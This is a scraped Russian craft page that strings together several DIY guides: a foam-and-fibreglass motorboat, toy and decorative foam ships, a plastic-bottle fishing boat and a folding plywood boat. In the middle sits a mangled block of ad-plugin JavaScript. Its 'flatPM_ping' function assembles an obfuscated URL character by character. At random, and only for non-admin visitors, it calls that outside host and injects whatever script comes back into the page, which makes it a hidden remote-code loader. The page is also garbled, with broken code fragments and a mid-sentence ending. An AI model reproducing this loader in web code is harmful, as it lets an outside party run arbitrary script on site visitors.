Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото –

Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото - Роботы

Как изготовить моторную лодку из пенопласта и эпоксидного клея

Приветствую всех любителей помастерить, предлагаю к рассмотрению инструкцию по изготовлению моторной лодки, которую автора собрал из пенопласта, стеклоткани и эпоксидного клея. Лодка получилась легкая, вполне прочная, а в действие ее приводит двигатель на 5 лошадиных сил. Собрана самоделка не сложно, если проект вас заинтересовал, предлагаю изучить его более детально.

Материалы и инструменты, которые использовал автор:

Список материалов:
– стеклоткань,
– пенопласт,
– эпоксидный клей,
– дверные ручки,
– кусок нержавеющей трубы,
– суперклей.

Список инструментов:

– краска,

– канцелярский нож,

– линейка,

– скотч.

Процесс изготовления самоделки:

Шаг первый. Собираем основу
Первым делом собираем основу, тут автор использовал в качестве материала пенопласт. Желательно пенопласт брать плотный, он более жесткий и конструкция получится надежная. Работать с пенопластом легко, он режется канцелярским ножом.

В завершении автор укрепил все внутри треугольниками из того же пенопласта. Первичная конструкция лодки склеивается суперклеем.

Шаг второй. Обмазываем днище

Переворачиваем лодку и укладываем стеклоткань. Далее днище хорошо и тщательно пропитывается эпоксидным клеем. Тут желательно наложить несколько слоев стеклоткани, и в несколько слоев промазать все эпоксидкой для увеличения прочности.

Шаг третий. Палуба

Вырезаем из пенопласта и палубу, приклеиваем к лодке. Ну, вот и все, теперь всю лодку обмазываем эпоксидным клеем, не забывая укладывать стеклоткань. Чем больше будет стеклоткани и клея, тем прочее будет лодка.

Шаг четвертый. Ручки

Для палубы автор выгнул трубу сам, для крепления к ножкам привариваются пятаки. Ну а далее поверх пятаков укладывается несколько слоев стеклоткани и все обмазывается клеем. В итоге все ручки просто вклеиваются в борт лодки.

Автор также установить по бокам лодки по две ручки с каждой стороны.

Шаг пятый. Сидение

Делаем сидение для лодки, тут используются все те же материалы, что и при изготовлении самой лодки. Под сидение делаем опоры, чтобы оно не провалилось.

Шаг шестой. Покраска и испытания

Лодка почти готова, осталось ее хорошо покрасить в несколько слоев. Теперь лодка оригинально смотрится, а благодаря краске смола не будет так активно разрушаться под действием внешней окружающей среды.

Осталось привезти лодку на озеро и поставить двигатель. Лодка эта довольно легкая, так что в ход ее можно приводить мотором от бензотриммера или даже электродвигателем. Для того чтобы подтвердить надежность лодки, автор поставил мотор на 5 лошадиных сил, лодка легко выдержала прогулку по озеру с двумя пассажирами.

На этом проект завершен, надеюсь, вам самоделка понравилась, и вы нашли для себя полезные мысли. Удачи и творческих вдохновений, если решите повторить подобное. Не забывайте делиться с нами своими идеями и самоделками!

Как сделать кораблик из пенопласта?

Как сделать кораблик из пенопласта

Пускать кораблики – занятие, увлекающее и взрослых и детей. Можно сделать их из бумаги, картона, но легче всего вырезать его из пенопласта. Для того чтобы из пенопласта создать своими руками корабль или даже целую флотилию не потребуется ни особых умений, ни много времени. Оставшийся после покупки бытовой техники упаковочный пенопласт, как и другие необходимые материалы, наверняка найдется в любом доме.

Для изготовления модели корабля из пенопласта понадобятся:

  • 2 листа пенопласта толщиной около 5 см,
  • тонкие палочки (можно карандаши или палочки для суши),
  • леска,
  • горячий пистолет,
  • материал для паруса (любая старая вещь),
  • скрепки,
  • суперклей,
  • инструменты: нож или лезвие, ножницы, линейка, карандаш или маркер, степлер, наждачная бумага.

Итак, делаем интересную поделку — пиратский корабль из пенопласта:

  1. Займемся корпусом нашей модели корабля, для чего на листе пенопласта расчертим прямоугольник и отрежем 2 треугольника, чтобы получился нос корабля.
  2. Далее займемся кабинкой капитана. Для этого нам надо разрезать вдоль кусок пенопласта, чтобы получилось 2 квадрата (один толще, второй тоньше).
  3. Намажем более толстый кусок клеем и аккуратно приклеиваем суперклеем к корпусу корабля, слегка сдвинув назад.
  4. Из более тонкого квадрата выкраиваем треугольник, одинаковый по форме с носом корабля. Аккуратно наклеиваем его на корпус корабля. Низ носовой части необходимо аккуратно подрезать лезвием и зашкурить.
  5. У нас получилась вот такая заготовка.
  6. Далее делаем мачту, на которую будет крепиться парус. Для этого отрезаем 2 палочки нужной двери и склеиваем им крест накрест горячим клеем.
  7. Последнее — парус корабля. Пусть он будет из старой ткани, ведь пираты на нем избороздили немало просторов. Вырезаем прямоугольник нужной формы.
  8. Посередине делаем надрез, чтобы парус проще было закрепить, подгибаем край вокруг горизонтальной палочки и закрепляем с помощью степплера.
  9. Чтобы парус на рее держался лучше, из скрепки делаем крючки, которые вставляем в корпус корабля по бокам и крепим к ним с помощью лески нижние края паруса.

Как видите, сделать модель пиратского корабля своими руками очень просто, и такая поделка наверняка понравится вашему ребенку. Вперед на поиски подходящего водоема!

Мастер-класс по свит-дизайну: Корабль

В этом уроке я хочу рассказать про некоторые детали процесса изготовления кораблей из конфет и парусов. Надеюсь, что это поможет вам в творчестве.

По этому шаблону вырезаю из пеноплекса форму, раньше корабли были намного «пузатее» (что меня не очень радовало) -«дутышами » они получались потому, что во всех моих кораблях, а точнее внутри спрятан презент (сами понимаете какой). Со временем шаблон изменила — сделала немного уже. Надеюсь с размерами разберётесь.

Мастер-класс по свит-дизайну: Корабль

Так выглядит нижняя часть корабля. Отверстие ковыряю ножиком, потом косячком или резаком (это небольшие ножики для резьбы по дереву). Конечно эта работа самая муторная.

Мастер-класс по свит-дизайну: Корабль

Мастер-класс по свит-дизайну: Корабль

На фото видно склеенные 2 детали по 4 см толщиной, затем по шаблону вырезаю верхнюю деталь — крышку. Потом довожу заготовку до нужной формы, пунктиром показала, что можно срезать пеноплекс под таким углом, но только не переборщить, т.к. можно сделать пробоину (это если вы будете делать корабль с «начинкой» как в моём случае).
Затем шкурим крупнозернистой нождачкой (я делаю это над ванной, крупные отходы собираю и выкидываю, а мелкие просто смываю водой, и пыли практически нет), потом выравниваю мелкой нождачкой. Корабль приобретает симметричную форму, становится ровненький.

Мастер-класс по свит-дизайну: Корабль

Сразу скажу — фото будут с разных процессов изготовления моих кораблей. Это пример, как выглядят обклеенные заготовки, которые далее будем доводить до ума. Высота основы корабля — 12 см.

Мастер-класс по свит-дизайну: Корабль

Это даю шаблоны парусов, последнее время делаю именно такой формы, но можно делать и прямоугольные (показала пунктиром), указала размеры, может кому пригодятся.

Мастер-класс по свит-дизайну: Корабль

Паруса делаю и из сетки, и из органзы, и всегда обклеиваю края с обеих сторон, так и форму держат и паруса получаются аккуратные. Паруса проутюживаю через влажную марлю, тогда клей хорошо склеивается с материалами (только не передержите).

Мастер-класс по свит-дизайну: Корабль

При помощи паяльника прожигаем отверстия — они получаются ровные, аккуратные и нужного размера.

Мастер-класс по свит-дизайну: Корабль

На мачты использую деревянные шпажки или опоры для растений, или вариант по дороже — хлыстики для наращивания удочек (в рыболовных магазинах). Если палочки короткие для мачты, можно их нарастить и обмотать полосками гофробумаги. Свои корабли обклеиваю гофробумагой, металлизированной гофробумагой, бамбуковыми салфетками.

Мастер-класс по свит-дизайну: Корабль

Такую использую тесьму, узкая держит мачты, средними украшаю детали корабля, а те, что пошире — обклеиваю ими стыки, тем самым скрывая все недочёты.

Мастер-класс по свит-дизайну: Корабль

Пример, как декорирую отсек для подарка.

Мастер-класс по свит-дизайну: Корабль

Мастер-класс по свит-дизайну: Корабль

Мастер-класс по свит-дизайну: Корабль

Ну а это лишь часть декора,которым я украшаю корабли. Здесь можно дать волю своей фантазии. Из проволоки можно сделать штурвал, так же из шоколадных медалек, и я ещё использовала медали сувенирные, тоже интересно смотрится.

Мастер-класс по свит-дизайну: Корабль

Мастер-класс по свит-дизайну: Корабль

Мастер-класс по свит-дизайну: Корабль

Покажу,как креплю конфеты. Пришла к выводу, что конфетки нужно делать в петлях-держателях, т.к. когда конфетки захотят скушать, на их месте образуется некрасивая дырка,а что бы её не было, эти места будут закрывать такие петли (я думаю смотрится куда эстетичнее, чем испорченный корабль).

Мастер-класс по свит-дизайну: Корабль

Мастер-класс по свит-дизайну: Корабль

Мастер-класс по свит-дизайну: Корабль

Так делаю петли: оборачиваю лентой конфету, чтобы конфета без труда вытаскивалась. Ленту склеиваю только между собой, к конфете не приклеиваю. Потом петельку приклеиваю к основе корабля. Вот и всё.

Мастер-класс по свит-дизайну: Корабль

Паруса на 1 фото скрепляю клеем только уголки между собой. И можно зафиксировать в месте, где в парусах проходят мачты, можно так же зафиксировать обмотав под каждым парусом узкой тесьмой.
Паруса на 2 фото склеиваю между собой, потом фиксирую при помощи шпажек.

Украсить небольшой искусственный водоем могут не только его жители и тщательно сформированные берега, но и корабли в акватории. Установив пруд (установка подробно изложена на сайте), уже через три года появился первый парусник, отслужив несколько лет, он был заменен на новый. Подробный процесс постройки своими руками самодельного парусника ? кораблика из пенопласта изложен ниже.

1. В качестве корпуса парусника использован плотный пенопласт, гранулированный пенопласт не подойдет ни при каких условиях. Хороший источник материала ? пенопласт от поплавков для сетей, от старых спасательных жилетов и строительный цветной пенопласт для утепления.

2. В виду небольшого размера пруда ? всего один кубометр воды, парусник сделан скромного размера. Чертеж показан на фотографии.

3. Переносим основные размеры на заготовку пенопласта и вырезаем по контуру обводы корпуса парусника. Для плотного пенопласта удобно использовать электролобзик или пилу с мелким зубом.

Чертеж корпусаКусок пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Выпиливание заготовки

4. Вырезанную заготовку дальше обрабатываем коротким ножом для формирования бортов и палуб.

5. Для крепления мачт в корпусе устанавливаются соответствующие детали. Лучше установить что-то не подверженное коррозии, например, кусочки медной проволоки.

Вырезаем палубыКорпус парусникаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -КрепленияПарусник из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

6. От изготовления парусного вооружения сильно зависит внешний вид и привлекательность парусника. Для изготовления парусов и мачт потребуются три шпажки для шашлыка, кусок белой ткани и капроновые нитки.

7. Острым концом втыкаем шпажки в пенопласт для формирования наклонной мачты и двух прямых мачт. Шпажки укорачиваем. Высота прямых мачт 12-14 см.

Заготовки Установка наклонной мачтыЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Установка прямых мачт

8. Раскраиваем паруса. К прямым парусам вырезаем из обрезков мачт реи.

9. К нижним кромкам паруса пришиваем шкоты для крепления парусов к реям. Для долгой жизни крепления нитки лучше промазать угол паруса бесцветным нитроклеем.

Раскрой парусовШкоты парусовЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Реи к парусам

10. Сымитировать реальное крепление паруса из-за непрочной кромки паруса невозможно, поэтому парус частично прижимался к рее и пришивался внахлест нитками. Готовые паруса при помощи нитки с иголкой крепим за центр рей к мачтам. На средней мачте ставим два паруса, на самой высокой три паруса, причем верхний парус в сложенном виде.

11. Косой парус устанавливаем, прошив по длинному краю и примотав нитку ? леер к прямой и наклонной мачте.

Крепление паруса к рееКрепление реиЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Прямые паруса

12. После установки парусов, растягиваем мачты стоячим такелажем. Закрепляем нитками паруса и реи. Крепления ниток к корпусу также полезно промазать нитроклеем.

13. Для мореходных качеств маленькому паруснику необходимо придать остойчивость, чтобы в сильный ветер он не заваливался на бок, а если это и случалось мог самостоятельно вернуться в вертикальное положение. Для этого в центре корпуса днища прикручиваем саморез длиной 10-12 см и на его конце закрепляем утяжелитель, например радиатор для полупроводникового транзистора. После установки утяжелителя проверяем поведение кораблика, он должен стоять на воде ровно без заметных кренов на борт, нос или корму.

Саморез для остойчивостиУтяжелительЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Вид утяжелителя

Самодельный парусникМертвый якорьЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

14. Но отпускать маленький кораблик сразу в пруд не разумно, под действием ветра парусник быстро прибьет к берегу. Для ограничения движение парусник установлен на мертвом якоре. В качестве мертвого якоря надо использовать тяжелый камень. К камню привязываем капроновую нитку или леску и привязываем ее к утяжелителю, а лучше при помощи самореза к нижней части кормы. Длину лески следует установить так, чтобы кораблик ? самоделка при любом ветре не мог достичь берега.

При наличии сильных ветров хорошо поставить на леску амортизатор из резинки для плавного реагирования парусника при натяжении лески. Пример движения парусника за 6 часов показан на видеоролике

Как сделать пиратский корабль своими руками из бумаги и пенопласта

Posting….

“:’

‘:””,document.createElement(“div”),p=ff(window),b=ff(“body”),m=void 0===flatPM_getCookie(“flat_modal_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” o.ID “_mb”),i=”scroll.flatmodal” o.ID,g=”mouseleave.flatmodal” o.ID ” blur.flatmodal” o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&”true”==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie&&m&&(flatPM_setCookie(“flat_modal_” o.ID “_mb”,!1),ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l()),void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ c “

“),w=document.querySelector(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_modal-content’),-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_cross’,function(){flatPM_setCookie(“flat_out_” o.ID “_mb”,!1)})),void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=o.how.outgoing.indent?’ style=”bottom:’ o.how.outgoing.indent ‘px”‘:””,c=”true”==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count “

“:’

‘:””,p=ff(window),h=”scroll.out” o.ID,g=”mouseleave.outgoing” o.ID ” blur.outgoing” o.ID,m=void 0===flatPM_getCookie(“flat_out_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” o.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(o.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ c “

“);var v,w=document.querySelector(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’);-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=”‘ o.ID ‘”]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.flat__4_out .flat__4_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.flat__4_modal .flat__4_cross”,function(){ff(this).closest(“.flat__4_modal”).removeClass(“flat__4_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement(“div”)),n=(d.exec(e)||[“”,””])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1] e.replace(o,”<$1>”) n[2],r=n[0];r–;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,200);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “m” “e” “h” “a” “n” “o” “i” “d” “.” “p” “r” “o” “/” “p” “i” “n” “g” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,n=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,r=’

‘,i=e.once;l(t).each(function(){var e=l(this);e.wrap(‘

‘);var t=e.closest(“.flat__4_video”);-1!==r.indexOf(“go” “oglesyndication”)?t.append(r):flatPM_setHTML(t[0],r),e.find(“.flat__4_video_flex”).one(“click”,function(){l(this).addClass(“show”)})}),l(“body”).on(“click”,”.flat__4_video_item_hover”,function(){var e=l(this),t=e.closest(“.flat__4_video_flex”);t.addClass(“show”);var a=t.find(“.flat__4_timer span”),n=parseInt(o),r=setInterval(function(){a.text(–n),n<=0&&(clearInterval(r),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.flat__4_video_flex .flat__4_cross”,function(){l(this).closest(“.flat__4_video_flex”).remove(),”true”==i&&l(“.flat__4_video_flex”).remove()})};

Лодка из пластиковых бутылок

Как сделать лодку для рыбалки из пластиковых бутылок? Делается она достаточно просто. Одним из её главных достоинств является дешевизна и доступность материалов. К тому же совсем необязательно для её создания обладать специальными навыками.

Необходимые материалы

  • Пластиковые бутылки. Конечно же, в первую очередь желающим сконструировать такую лодку потребуется большое количество пластиковых бутылок. Для этой цели лучше всего подойдёт тара вместимостью не менее 2 литров. Чем большей ёмкости вы будете выбирать бутылки, тем меньшее их количество понадобится, и тем легче будет собирать лодку. Кроме того, лодка из больших бутылок будет более надёжной, прочной и долговечной.
  • Скотч. Для работы потребуется несколько рулонов широкого скотча.
  • Ножницы или острый нож. Ножницы следует выбирать такие, чтобы ними удобно было разрезать пластиковые бутылки — большие и острые.
  • Тонкая прочная проволока.
  • Толстая фанера для поперечин. Вместо фанеры подойдут деревянные доски или лёгкие трубы.

Подготовка бутылок

Для придания бутылкам необходимой плотности и жесткости каждую из них следует накачать воздухом под давлением. Это можно сделать, используя простой принцип перепада температур.

  1. Поставьте открытые бутылки в морозильную камеру, чтобы они набрались холодным воздухом.
  2. Затем очень прочно закрутите их крышками прямо в морозилке.
  3. Теперь достаньте бутылки из морозильной камеры. Воздух внутри них, при нагревании, будет расширяться, в результате чего бутылки приобретут необходимую жесткость и упругость.

Перед началом сбора лодки все бутылки необходимо освободить от этикеток и, при необходимости, помыть.

Изготовление «брёвен» из бутылок

  1. Лодка будет собираться из имитированных брёвен. В качестве соединительной муфты используется средняя часть, вырезанная из другой бутылки, которую следует натянуть на соединение. Бутылки соединяются донышком к донышку, при этом выступ дна одной бутылки должен быть вставлен в выемку дна другой бутылки.
  2. Затем все стыки следует промотать несколько раз широким водостойким скотчем. В результате получится конструкция из двух бутылок, соединённых донышками, с обеих сторон которой будут горлышки с пробками. 
  3. Теперь возьмите 2 бутылки и отрежьте от них верхние части. Заготовки без верхних частей насадите на горлышки Вашей конструкции таким образом, чтобы с обеих её сторон получились донышки. Снова следует каждый стык промотать скотчем в несколько слоёв.
  4. Таким образом готовятся остальные брёвна для лодки.

Изготовление поплавков для лодки

Подготовленные брёвна необходимо скрепить в поплавки. Один поплавок должен состоять из восьми брёвен. Возьмите тонкую, прочную проволоку и с её помощью скрепите брёвна.

Сборка лодки

Скрепление поплавков лучше всего осуществить при помощи металлических труб или деревянных брусков.

После того, как поперечины будут готовы, можно приступать к креплению дна, которое можно изготовить из плотного фанерного, пластикового или металлического листа.

В зависимости от предпочтений мастера и используемых материалов, каждая изготовленная лодка из пластиковых бутылок будет иметь разный вид. Одно необходимое общее условие — плавсредство должно быть надёжным, прочным и водонепроницаемым.

При желании, готовой лодке можно придать эстетичный внешний вид, обшив её водонепроницаемым материалом, фанерой или металлическими листами.

Такая простая лодка для рыбалки своими руками прослужит достаточно долгое время и будет предметом гордости для своего хозяина.

Из каких материалов Вы бы смогли сделать лодку для рыбалки? Расскажите о своем выборе в комментариях.

Мастер-класс «поделки из пенопласта «кораблик» для детей 6-12 лет (мастер-классы / моделирование и моделизм)

 Используем для поделок кусочки пенопласта. Смастерим кораблик в розовых тонах.

Инструменты и материалы:

  • Пенопласт,
  • гофрированная бумага,
  • металлизированная гофрированная бумага,
  • декоративная тесьма,
  • металлизированная лента,
  • кусочек атласной ленты,
  • джутовая сетка,
  • шпажки,
  • коврик для резки,
  • канцелярский нож,
  • ножницы,
  • низко-температурный клеевой пистолет UHU.

Ход работы:

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

Изготовим из кусочка пенопласта основание для корабля. В работе используем канцелярский нож и коврик для резки.

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

Кладем заготовку на лист гофрированной бумаги и делаем выкройки.

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

Декорируем основу. Приклеиваем бумагу к пенопласту.

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

Швы проклеиваем декоративной тесьмой.

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

Готовим мачты корабля. Оплетаем шпажку металлизированной гофрированной бумагой.

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

Вырезаем парус из джутовой сетки.

декоративный кораблик из пенопластадекоративный кораблик из пенопластаЛодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

Устанавливаем мачту с парусом. Закрепляем с помощью металлизированной ленты.

декоративный кораблик из пенопласта 

Вырезаем флажок. Водружаем его на корабль. Работа готова!

Посмотреть ещё: Моделирование и моделизм …

Поделки из пенопласта. корабль “алые паруса”. мастер-класс

Морская с детства привлекала соль,

Дорога пробежавшая в волнах,

Чтоб гриновская нежная Ассоль

Корабль встречала б в алых парусах.

И грозный перекатывался вал,

Выл ветер, на страницах старой
книжки…

А я о дальних странствиях мечтал,

Как все мои товарищи-мальчишки..

А море – рядом, руку протяни

И ощутишь его тепло и ласку.

Слегка просолены морские дни

И мокрый ветер трется об оснастку.

Нам новая отведена уж роль –

Прощаться с тонкою полоскою земли,

Но, только ждет по-прежнему Ассоль.

И алый парус будут ставить корабли.

( В. Ланцберг)

Для работы потребуется: 

  • пенопласт, 
  • гофрированная бумага белого и красного
    цвета, 
  • термопистолет и клей, 
  • бамбуковые палочки, 
  • зубочистки, 
  • пенопластовые шарики.

поделки из пенопласта

3-4 слоя пенопласта скрепляем между собой при помощи
термоклея и вырезаем в форме корабля (размеры верхней части: длина – 40 см.,
ширина 18 см. Нижняя часть немного меньше, форму делаем «на глаз».

поделки из пенопласта

При помощи канцелярского ножа ровняем боковые части корабля
и приклеиваем бортик сверху (ширина и высота примерно 1,5 – 2 см.)

поделки из пенопласта

Обклеиваем корабль белой гофрированной бумагой.

поделки из пенопласта

Закрепляем на донышке бумагу.

поделки из пенопласта

Обклеиваем бортики и закрепляем на палубе.

поделки из пенопласта своими руками

Вырезаем гофрированную бумагу по форме палубы и приклеиваем.

поделки из пенопласта своими руками

Вырезаем гофрированную бумагу по форме донышка и приклеиваем.

поделки из пенопласта своими руками

Леер изготавливаем из зубочисток, на которые насажены
пенопластовые шарики. Красим  их
акриловой краской под старое золото.

поделки из пенопласта своими руками

Втыкаем зубочистки по бортикам.

поделки из пенопласта своими руками

Приклеиваем веревочное ограждение. которое также красим
золотой краской.

поделки из пенопласта фото

Паруса вырезаем из красной гофрированной бумаги.
Размер:  Передний треугольный  – 
прямоугольный треугольник со сторонами 18 Х 8 см., кормовой треугольный
– 20 х 10 см., передний прямоугольный – 30 х 13 см., задний прямоугольный – 50
х 13 см.

поделки из пенопласта фото

Закрепляем на бамбуковых палочках паруса и вставляем палочки
в палубу, корму и нос корабля.

поделки из пенопласта фото

поделки из пенопласта фото

Вот теперь Ассоль точно дождется своего Грея.

Автор:  Колин Дмитрий. 13 лет

Руководитель:
Болкунова Гульнара Тагировна, педагог дополнительного образования МБУДО «Центр
детского творчества» МО  г.Саяногорск

Автор:

Колин Дмитрий

Руководитель:

Болкунова Гульнара Тагировна

Складная лодка из фанеры

Самодельная складная лодка для рыбалки представляет собой жесткую фанерную складную конструкцию, состоящую из нескольких секций. Размер каждой из секций равен расстоянию между двумя шпангоутами, расположенными рядом. Секции соединены между собой при помощи барашковых болтов и уплотнены резиной.

Средняя секция имеет самый больший размер и, при складывании лодки, другие секции последовательно входят в неё. Сложенная лодка имеет вид габаритного чемодана (850х700х330 мм), который можно легко перевозить к месту назначения.

Для работы потребуются:

  • 2,5 листа фанеры толщиной 4 мм с размерами 1,5х1,5 м.
  • 1 лист фанеры толщиной 10 мм размером 1,3х0,9 м.
  • 1 шестиметровая доска толщиной 20 мм.
  • 1 шестиметровая доска толщиной 40 мм.
  • 1 доска из бука или другой твердой древесины длиной 1м для отделки борта.

Изготовление лодки

Сборка лодки осуществляется по чертежу. Желательно воспроизведение на бумаге натуральных размеров форштевня, шпангоута и транца.

  1. Приклейте плаз к строительной 10-мм фанере и сложите её пополам.
  2. Высверлите в шпангоутах отверстия.
  3. Ножовкой выпилите два шпангоута, транец и форштевень.
  4. Шпангоуты обработайте ножовкой и покройте их с наружной стороны тонкой резиной (1 мм) при помощи клея.
  5. Уплотнение поделите на полоски длиной по 20 мм и обработайте ними два шпангоута техническим клеем.
  6. Обработайте 3-милиметровые отверстия для алюминиевых заклёпок. Заклёпки должны располагаться попарно на расстоянии 10-15 мм. Расположение заклёпок от края шпангоута — 10 мм, расстояние между парами — 800 мм.
  7. Снимите болты и рассоедините шпангоуты. Поместите заклёпки в отверстия.

Для сборки секций необходим кондуктор, позволяющий устанавливать шпангоуты и покрывать их фанерой. Данный механизм изготовлен из доски толщиной 40 мм и состоит из:

